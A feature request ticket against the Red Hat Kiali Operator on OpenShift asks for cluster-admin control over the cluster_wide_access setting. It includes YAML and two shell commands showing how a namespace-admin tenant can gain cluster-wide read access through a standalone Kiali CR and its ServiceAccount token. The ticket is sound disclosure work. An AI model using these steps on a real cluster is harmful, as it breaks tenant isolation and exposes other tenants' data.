- Feature Request
- Resolution: Unresolved
- Normal
- openshift-4.16
- Product / Portfolio Work
1. Proposed title of this feature request
allow cluster-admins to control whether kiali_cr.spec.cluster_wide_access=true is usable in a cluster and/or by whom
2. What is the nature and description of the request?
CONTEXT/BACKGROUND:
We employ a specific multitenancy model on our clusters - "namespace(s) as a service".
In practice, we create one or more namespaces for a tenant and make the tenant an admin in those namespaces (by binding ClusterRole/admin with RoleBinding(s)).
The tenant receives only the aforementioned RBAC permissions and nothing else.
They cannot (and must not) access any resources outside of their allocated namespace(s), especially not other tenants' namespaces.
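For illustration, a minimal sketch of such a binding, assuming a hypothetical tenant group "tenant-a" and namespace "tenant-a-ns1" (all names are placeholders, not our actual resources):

  apiVersion: rbac.authorization.k8s.io/v1
  kind: RoleBinding
  metadata:
    name: tenant-a-admin              # hypothetical name
    namespace: tenant-a-ns1           # one of tenant A's namespaces
  subjects:
  - kind: Group
    name: tenant-a                    # hypothetical tenant group
    apiGroup: rbac.authorization.k8s.io
  roleRef:
    kind: ClusterRole
    name: admin                       # built-in admin ClusterRole, bound only namespace-locally
    apiGroup: rbac.authorization.k8s.io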
Furthermore, we still operate with OpenShift Service Mesh v2.6.11 (OSSMv2).
If a tenant (hereinafter called A) needs a Kiali instance, they get one by setting the_servicemeshcontrolplane_of_tenant_a.spec.addons.kiali.enabled=true.
Put differently, all Kiali CRs in a cluster are managed via ServiceMeshControlPlanes (SMCPs), our tenants do not create standalone Kiali CRs.
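A minimal sketch of such a tenant-managed SMCP, assuming OSSMv2 and hypothetical names ("basic", "tenant-a-ns1"):

  apiVersion: maistra.io/v2
  kind: ServiceMeshControlPlane
  metadata:
    name: basic                       # hypothetical SMCP name
    namespace: tenant-a-ns1           # tenant A's control plane namespace
  spec:
    version: v2.6
    addons:
      kiali:
        enabled: true                 # this is how tenant A requests a Kiali instance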
Luckily, OSSMv2 populates managed_kiali_cr_of_tenant_a.spec.deployment.accessible_namespaces with the list of tenant A's namespaces that they included in their service mesh.
As a consequence, ClusterRole/kiali-reader gets bound only in those namespaces, and only via RoleBindings.
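The relevant fragment of the operator-managed Kiali CR then looks roughly like this (namespace names are again placeholders):

  apiVersion: kiali.io/v1alpha1
  kind: Kiali
  metadata:
    name: kiali
    namespace: tenant-a-ns1           # the SMCP namespace
  spec:
    deployment:
      accessible_namespaces:          # populated by OSSMv2
      - tenant-a-ns1
      - tenant-a-ns2                  # only tenant A's mesh-member namespaces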
ACTUAL PROBLEM:
Suppose tenant A creates a standalone Kiali CR in one of their namespaces (it does not even have to be a mesh-member one); let us call it namespace X.
Currently*, nothing prevents tenant A from setting standalone_kiali_cr_of_tenant_a.spec.cluster_wide_access=true, which leads to the following:
the Kiali-related ServiceAccount in namespace X gets bound to ClusterRole/kiali-viewer via a ClusterRoleBinding!
Tenant A can now use that SA, for instance, to list all pods in all namespaces on the cluster, far beyond what they should be allowed to do.
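To make the escalation concrete, a minimal sketch ("namespace-x" is a placeholder; to our understanding the flag is nested under spec.deployment in recent Kiali CR schemas, and the operator-created ServiceAccount name may differ from kiali-service-account):

  apiVersion: kiali.io/v1alpha1
  kind: Kiali
  metadata:
    name: kiali
    namespace: namespace-x            # any namespace where tenant A is admin
  spec:
    deployment:
      cluster_wide_access: true       # nothing currently rejects or restricts this

Being admin in namespace X, tenant A can then obtain a token for that ServiceAccount (via oc create token if permitted, or simply by running a pod with that ServiceAccount) and use it cluster-wide, e.g.:

  TOKEN=$(oc create token kiali-service-account -n namespace-x)
  oc --token="$TOKEN" get pods --all-namespaces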
Notes:
*We are using Kiali Operator v2.17.1 provided by Red Hat via OperatorHub, but we had also been able to reproduce the issue with v2.11.4 previously.
In general, the issue should be reproducible in all versions of the Kiali Operator (provided by Red Hat) currently available via OperatorHub.
3. Why does the customer need this? (List the business requirements here)
Currently, the Kiali Operator (provided by Red Hat via OperatorHub) is not multitenant-ready or, at least, it does not support our multitenancy approach, namely the aforementioned "namespace(s) as a service".
4. List any affected packages or components.
All versions of the Kiali Operator (provided by Red Hat) currently available in OperatorHub.